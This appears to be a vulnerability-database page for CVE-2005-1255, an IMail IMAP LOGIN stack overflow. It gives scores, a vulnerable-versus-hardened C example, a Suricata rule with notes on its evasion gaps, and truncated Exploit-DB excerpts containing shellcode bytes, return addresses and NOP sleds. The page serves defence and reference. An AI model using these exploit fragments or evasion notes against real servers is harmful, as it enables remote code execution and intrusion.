CVE-2005-1255
Published: 2005-05-25
Priority: P3 (57)
CVSS 2.0: 10.0 (critical), vector AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: available
EPSS: 42.81% (98.5th percentile)
Multiple stack-based buffer overflows in the IMAP server in IMail 8.12 and 8.13 in Ipswitch Collaboration Suite (ICS), and other versions before IMail Server 8.2 Hotfix 2, allow remote attackers to execute arbitrary code via a LOGIN command with (1) a long username argument or (2) a long username argument that begins with a special character.
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ipswitch | imail | — | — |
| ipswitch | imail | — | — |
| ipswitch | imail_server | <= 8.2_hotfix_2 | — |
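The description names the bug class but the page carries none of IMail's code, so what follows is a constructed illustration added for this page (not Ipswitch's source; the 64-byte buffer and the `<tag> LOGIN <user> <pass>\r\n` line shape are assumptions): a LOGIN handler that copies the username argument into a fixed stack buffer, beside a parser that bounds every token before copying. The second variant in the description, a long username that begins with a special character, is a reminder that the length check has to cover every branch that handles the argument, not only the common one.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed illustration of the bug class, not IMail's source: the buffer
 * sizes and the "<tag> LOGIN <user> <pass>\r\n" line shape are assumptions. */
#define USER_MAX 64
#define PASS_MAX 64

/* Vulnerable shape: the username argument is copied into a fixed-size stack
 * buffer with no length check, so an argument of USER_MAX bytes or more
 * overwrites the saved frame. Shown for contrast only; never call it on
 * untrusted input. */
void login_unsafe(const char *args)
{
    char user[USER_MAX];
    const char *sp = strchr(args, ' ');
    size_t n = sp ? (size_t)(sp - args) : strlen(args);
    memcpy(user, args, n);              /* stack overflow when n >= USER_MAX */
    user[n] = '\0';
    (void)user;
}

/* Copy the next space-delimited token from *p into dst and advance *p.
 * Returns the token length, or -1 if the token is empty or would not fit
 * (including the terminating NUL). */
static int copy_token(const char **p, char *dst, size_t dstlen)
{
    const char *s = *p;
    size_t n = 0;
    while (*s == ' ') s++;
    while (s[n] && s[n] != ' ' && s[n] != '\r' && s[n] != '\n') n++;
    if (n == 0 || n >= dstlen) return -1;
    memcpy(dst, s, n);
    dst[n] = '\0';
    *p = s + n;
    return (int)n;
}

/* Hardened shape: every token, on every path, is length-checked before it is
 * copied. Oversized input is rejected rather than truncated, so the server
 * never authenticates a username other than the one the client sent.
 * Returns 0 on success, -1 on malformed or oversized input. */
int parse_login_safe(const char *line, char *user, size_t ulen,
                     char *pass, size_t plen)
{
    char tag[32], cmd[16];
    const char *p = line;
    if (copy_token(&p, tag, sizeof tag) < 0) return -1;
    if (copy_token(&p, cmd, sizeof cmd) < 0) return -1;
    for (char *c = cmd; *c; c++) *c = (char)toupper((unsigned char)*c);
    if (strcmp(cmd, "LOGIN") != 0) return -1;
    /* The same bounded copy handles a plain username and one that starts
     * with a special character; there is no unchecked second path. */
    if (copy_token(&p, user, ulen) < 0) return -1;
    if (copy_token(&p, pass, plen) < 0) return -1;
    return 0;
}

/* Parse one line into caller-sized buffers; returns parse_login_safe's result. */
int check_login(const char *line)
{
    char user[USER_MAX], pass[PASS_MAX];
    return parse_login_safe(line, user, sizeof user, pass, sizeof pass);
}

/* Build "a001 LOGIN <first><n-1 x 'A'> secret\r\n" (constructed input, n >= 1)
 * and parse it; n is the username length, first its leading byte. */
int login_probe(size_t n, char first)
{
    char *line = malloc(n + 32);
    if (!line) return -2;
    int k = sprintf(line, "a001 LOGIN ");
    memset(line + k, 'A', n);
    line[k] = first;
    k += (int)n;
    strcpy(line + k, " secret\r\n");
    int rc = check_login(line);
    free(line);
    return rc;
}

int main(void)
{
    printf("normal login     -> %d\n", check_login("a001 LOGIN alice secret\r\n"));
    printf("63-byte username -> %d\n", login_probe(USER_MAX - 1, 'a'));
    printf("64-byte username -> %d\n", login_probe(USER_MAX, 'a'));
    printf("500 bytes, '~'   -> %d\n", login_probe(500, '~'));
    return 0;
}
```

Rejecting rather than truncating is deliberate: a parser that silently cut the username at 63 bytes would be memory-safe, but it would authenticate `alice` followed by 500 bytes of padding as `alice`, which is a different bug.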
Suricata: GPL IMAP login buffer overflow attempt (sid 2101842, rev 16; created 2010-09-23, updated 2019-07-26). Indexed under CVE-1999-0005; the rule also references CVE-1999-1557, CVE-2005-1255 and CVE-2007-2795, so it is a generic long-LOGIN signature rather than one specific to IMail.
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 143 (msg:"GPL IMAP login buffer overflow attempt"; flow:established,to_server; content:"LOGIN"; isdataat:100,relative; pcre:"/\sLOGIN\s[^\n]{100}/smi"; reference:bugtraq,13727; reference:bugtraq,502; reference:cve,1999-0005; reference:cve,1999-1557; reference:cve,2005-1255; reference:nessus,10123; reference:cve,2007-2795; reference:nessus,10125; classtype:attempted-user; sid:2101842; rev:16; metadata:created_at 2010_09_23, cve CVE_1999_0005, confidence High, signature_severity Major, updated_at 2019_07_26;)
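To see exactly what this signature fires on, here is a C re-implementation of its payload test, added for this page and not part of the Suricata/ET rule set (the sample lines are constructed, not captured traffic), run over a normal LOGIN, the advisory's long-username shape, and the same username sent as an IMAP literal.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Re-implementation (added here, not part of the rule set) of the rule's
 * payload test pcre:"/\sLOGIN\s[^\n]{100}/smi": a whitespace byte, "LOGIN" in
 * any case, a whitespace byte, then at least 100 bytes none of which is '\n'.
 * Returns 1 if the buffer would fire the rule, 0 otherwise. */
int imap_login_overflow_match(const unsigned char *buf, size_t len)
{
    static const char kw[] = "LOGIN";
    for (size_t i = 0; i + 7 <= len; i++) {
        if (!isspace(buf[i])) continue;
        size_t k;
        for (k = 0; k < 5; k++)
            if (toupper(buf[i + 1 + k]) != (unsigned char)kw[k]) break;
        if (k < 5 || !isspace(buf[i + 6])) continue;
        size_t start = i + 7, run = 0;
        while (run < 100 && start + run < len && buf[start + run] != '\n') run++;
        if (run == 100) return 1;
    }
    return 0;
}

/* Convenience wrapper for NUL-terminated sample lines. */
int detect_line(const char *s)
{
    return imap_login_overflow_match((const unsigned char *)s, strlen(s));
}

/* Constructed client line "a001 LOGIN <n x 'A'> secret\r\n" (the advisory's
 * long-username shape) run through the matcher. */
int detect_probe(size_t n)
{
    unsigned char *line = malloc(n + 32);
    if (!line) return -1;
    size_t k = (size_t)sprintf((char *)line, "a001 LOGIN ");
    memset(line + k, 'A', n);
    k += n;
    k += (size_t)sprintf((char *)line + k, " secret\r\n");
    int m = imap_login_overflow_match(line, k);
    free(line);
    return m;
}

/* The same username sent as an IMAP literal: "a001 LOGIN {n}\r\n" followed by
 * the n bytes, concatenated as the reassembled client stream would look. */
int detect_literal_probe(size_t n)
{
    unsigned char *line = malloc(n + 48);
    if (!line) return -1;
    size_t k = (size_t)sprintf((char *)line, "a001 LOGIN {%zu}\r\n", n);
    memset(line + k, 'A', n);
    k += n;
    k += (size_t)sprintf((char *)line + k, " secret\r\n");
    int m = imap_login_overflow_match(line, k);
    free(line);
    return m;
}

int main(void)
{
    printf("normal login          -> %d\n", detect_line("a001 LOGIN alice secret\r\n"));
    printf("91-byte username      -> %d\n", detect_probe(91));
    printf("92-byte username      -> %d\n", detect_probe(92));
    printf("1000-byte username    -> %d\n", detect_probe(1000));
    printf("1000 bytes as literal -> %d\n", detect_literal_probe(1000));
    return 0;
}
```

Two properties worth knowing before relying on the rule: the 100-byte count starts right after `LOGIN ` and runs to the next newline, so it includes the password and the trailing `\r` (a 92-byte username with the 6-byte password `secret` already fires, and so does a long password behind a short username), and it cannot span a CRLF, so a username sent as an IMAP literal (`{1000}` followed by a continuation) is not matched at all. The rule is also bound to port 143, so IMAPS on 993 is not inspected unless the traffic is decrypted upstream.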
Exploit-DB: Mercur Messaging 2005 - IMAP Login Buffer Overflow (Metasploit), 2010-08-25. Note: this entry is indexed under CVE-2006-1255 (Atrium Mercur IMAP 5.0 SP3), a different bug in a different product; it is not an exploit for CVE-2005-1255.
---
##
# $Id: mercur_login.rb 10150 2010-08-25 20:55:37Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Mercur Messaging 2005 IMAP Login Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3.
					Since the room for shellcode is small, using the reverse ordinal payloads
					yields the best results.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10150 $',
			'References'     =>
				[
					[ 'CVE', '2006-125
Exploit-DB: IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow, 2007-04-01 (CVE-2005-1255)
---
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Ipswitch IMAIL Server IMAPD 7.13 - 8.20 exploit
* Site : http://www.ipswitch.com
* Found by : iDEFENSE Security (http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=243)
* ----------------------------------------
* Exploit date : 31.03.2007
* Exploit writer : Heretic2 ([email protected])
* OS : Windows 2000 SP4 and Windows XP ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Info: Well, this is the realization of the IMAIL IMAPd 'LOGIN' buffer overflow vulnerability.
* The version provided by kcope uses the SEH overwrite method, which doesn't work on Windows XP SP2,
* so I have written the exploit that overwrites EI
Exploit-DB: Mercur Messaging 2005 - IMAP Remote Buffer Overflow, 2007-01-15. Note: this entry is indexed under CVE-2006-1255 (Mercur Messaging), a different bug in a different product; it is not an exploit for CVE-2005-1255.
---
#!/bin/perl
# tested on win2k server SP4 English
# ATTENTION! If you have another valid account you must change the offsets; this is only a PoC
#
use IO::Socket::INET;
my $host = shift(@ARGV);
my $port = 143;
my $reply;
my $request;
my $user = "test";
my $pass = "test";
my $nop = "\x90"x8;
my $nop1 = "\x90"x20;
my $ret = "\x42\xb2\xc1\x40";
#my $ret = "\x42\x42\x42\x42"; #call edi in mcrimap4.exe
my $asm="\x8b\xc7\x83\xc0\x23\x50\xc3";
# asm is a binary translation of these assembly instructions; EAX now has the correct memory address for the shellcode
#
# 8BC7 MOV EAX,EDI
# 83C0 23 ADD EAX,23
# 50 PUSH EAX
# C3 RETN
# A binary translation of NGS "Writing Small Shellcode" by Dafydd Stuttard with only two little differences
#1)b
Exploit-DB: IPSwitch IMail Server 8.15 - IMAPD Remote Code Execution, 2005-08-01 (CVE-2005-1255)
---
# IpSwitch IMAIL Server IMAPD Remote r00t Exploit by kcope
# June 2005
# Confidential!
use IO::Socket;
# 316 bytes
$cbsc =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\xC2\xE2\xFA"
."\xEB\x05\xE8\xEB\xFF\xFF\xFF"
."\x2B\x39\xC2\xC2\xC2\x9D\xA6\x63\xF2\xC2\xC2\xC2\x49\x82\xCE\x49"
."\xB2\xDE\x6F\x49\xAA\xCA\x49\x35\xA8\xC6\x9B\x2A\x59\xC2\xC2\xC2"
."\x20\x3B\xAA\xF1\xF0\xC2\xC2\xAA\xB5\xB1\xF0\x9D\x96\x3D\xD4\x49"
."\x2A\xA8\xC6\x9B\x2A\x40\xC2\xC2\xC2\x20\x3B\x43\x2E\x52\xC3\xC2"
."\xC2\x96\xAA\xC3\xC3\xC2\xC2\x3D\x94\xD2\x92\x92\x92\x92\x82\x92"
."\x82\x92\x3D\x94\xD6\x49\x1A\xAA\xBD\xC2\xC2\xC3\xAA\xC0\xC2\xC2"
."\xF7\x49\x0E\xA8\xD2\x93\x91\x3D\x94\xDA\x47\x02\xB7\x88\xAA\xA1"
."\xAF\xA6\xC2\x4B\xA4\xF2\x41\x2E\x9
Exploit-DB: IPSwitch IMAP Server - LOGON Remote Stack Overflow, 2005-06-07 (CVE-2005-1255)
---
/*
IpSwitch IMAP Server LOGON stack overflow.
Software Hole discovered by iDEFENSE
POC written by nolimit and BuzzDee
First, some information for the few of you that know how this stuff works.
The reason you see no SP2 or 2003 offsets is because of Windows SEH checks.
That's right, in this one situation, they've stopped hackers from exploiting the machine.
At least with as much research as I care to do. The problem lies in the
fact that only alphanumeric memory addresses can be used in this exploit.
So what lies within the few regions of memory that are alphanumeric safe? Only system
DLLs. (Well, also a 7000-byte TEB block section, which doesn't really produce much either.)
So any SEH address overwritten that points to a system DLL wi
No writeups or analysis indexed.
References
http://securitytracker.com/id?1014047
http://www.idefense.com/application/poi/display?id=243&type=vulnerabilities
http://www.ipswitch.com/support/imail/releases/imail_professional/im82hf2.html
http://www.securityfocus.com/bid/13727